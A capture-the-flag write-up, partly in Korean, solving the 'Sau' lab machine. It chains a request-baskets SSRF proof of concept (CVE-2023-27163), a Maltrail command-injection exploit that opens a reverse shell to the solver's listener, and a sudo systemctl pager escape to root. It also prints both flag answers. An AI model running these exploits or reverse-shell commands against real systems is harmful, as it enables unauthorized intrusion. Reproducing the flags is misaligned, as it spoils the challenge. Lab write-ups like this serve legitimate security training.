Machine: Sau
TARGET: 10.129.229.26



Task 1

Which is the highest open TCP port on the target machine?

nmap -sV -sC -oA nmap/Sau 10.129.229.26

PORT      STATE    SERVICE VERSION                                                                                                                   
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)  
80/tcp    filtered http                                                                                                                              
55555/tcp open     http    Golang net/http server  

> 55555


Task 2

What is the name of the open source software that the application on 55555 is "powered by"?


http://10.129.229.26:55555/web/baskets
웹페이지 하단에 Powered by request-baskets | Version: 1.2.1
> request-baskets 

request-baskets1.2.1

Task 3

What is the version of request-baskets running on Sau?

> 1.2.1

Task 4

What is the 2023 CVE ID for a Server-Side Request Forgery (SSRF) in this version of request-baskets?

google search: request-baskets 1.2.1
https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2023-27163

> CVE-2023-27163

Task 5

What is the name of the software that the application running on port 80 is "powered by"?

현재 80번 포트는 filtered되어 있음

ssrf로 로컬로 접속을 해야 할것같다
https://github.com/entr0pie/CVE-2023-27163

wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh

python3 -m http.server 9999
bash ./CVE-2023-27163.sh http://10.129.229.26:55555/ http://10.10.14.156:9999/ 
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "akrzyl" proxy basket...
> Basket created!
> Accessing http://10.129.229.26:55555/akrzyl now makes the server request to http://10.10.14.156:9999/.
./CVE-2023-27163.sh: line 43: jq: command not found
> Response body (Authorization): {"token":"4z8pr3DLCfsKh6jBeTrv3ZyBA_YoSpso05e88_gN-E2l"}

http://10.129.229.26:55555/akrzyl 웹페이지를 확인하니 공격자의 파일들이 인덱싱되어 나와있는걸 확인할수있다

bash ./CVE-2023-27163.sh http://10.129.229.26:55555/ http://127.0.0.1:80/ 명령어 머신 80번 포트로 수정
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "jlvros" proxy basket...
> Basket created!
> Accessing http://10.129.229.26:55555/jlvros now makes the server request to http://127.0.0.1:80/.
./CVE-2023-27163.sh: line 43: jq: command not found
> Response body (Authorization): {"token":"-A0iAK6w3l-fusoabqc3pwPWXJUtZ1IwjCMIAW045r5y"}

http://10.129.229.26:55555/jlvros 접속

> Maltrail

Task 6

There is an unauthenticated command injection vulnerability in MailTrail v0.53. What is the relative path on the webserver targeted by this exploit?


https://vulners.com/exploitdb/EDB-ID:51676

def main():
	listening_IP = None
	listening_PORT = None
	target_URL = None

	if len(sys.argv) != 4:
		print("Error. Needs listening IP, PORT and target URL.")
		return(-1)
	
	listening_IP = sys.argv[1]
	listening_PORT = sys.argv[2]
	target_URL = sys.argv[3] + "/login"
	print("Running exploit on " + str(target_URL))
	curl_cmd(listening_IP, listening_PORT, target_URL)

> /login



Task 7

What system user is the Mailtrack application running as on Sau?
https://github.com/spookier/Maltrail-v0.53-Exploit
nc -nlvp 8888
python3 exploit.py 10.10.14.156 8888 http://10.129.229.26:55555/jlvros

리버스셸 연결

> puma


Submit User Flag

Submit the flag located in the puma user's home directory.

> de1fe822eea8f84d4c69ca2429e78cff



Task 9

What is the full path to the binary (without arguments) the puma user can run as root on Sau?

sudo -l 
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

> /usr/bin/systemctl


Task 10

What is the full version string for the instance of systemd installed on Sau?
systemctl --version
systemd 245 (245.4-4ubuntu3.22)
+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN2 -IDN +PCRE2 default-hierarchy=hybrid

> systemd 245 (245.4-4ubuntu3.22)

Task 11

What is the 2023 CVE ID for a local privilege escalation vulnerability in this version of systemd?

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2023-26604
> CVE-2023-26604

Submit Root Flag

Submit the flag located in the root user's home directory.


sudo /usr/bin/systemctl status trail.service

!sh
id 
uid=0(root) gid=0(root) groups=0(root)

cat /root/root.txt
> afc4350a2648b48b982367db13b5a9e3